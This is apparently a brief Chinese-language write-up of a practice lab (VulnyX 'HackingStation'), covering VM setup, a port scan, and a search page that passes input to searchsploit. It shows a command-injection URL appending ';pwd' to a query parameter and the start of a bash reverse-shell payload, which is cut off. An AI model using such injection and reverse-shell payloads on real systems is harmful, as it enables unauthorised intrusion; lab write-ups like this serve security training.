靶场练习-vulnyx:HackingStation
# 靶场搭建 下载地址:HackingStation 直接导入,点击重试,NAT 模式打开就 OK 了 IP: 192.168.1.131 # 渗透过程 # 信息初收集 只开了 80 端口 打开网页抽了一眼有一个搜索,尝试下注入,无果。 仔细看了一下,发现是 searchsploit,怀疑后台是执行的命令,测试一下: http://192.168.1.131/exploitQuery.php?product=blog.gddfeng.com;pwd 返回了路径,OK 了家人,反弹直接拿 shell 1;bash -c 'bash -i >&...
more...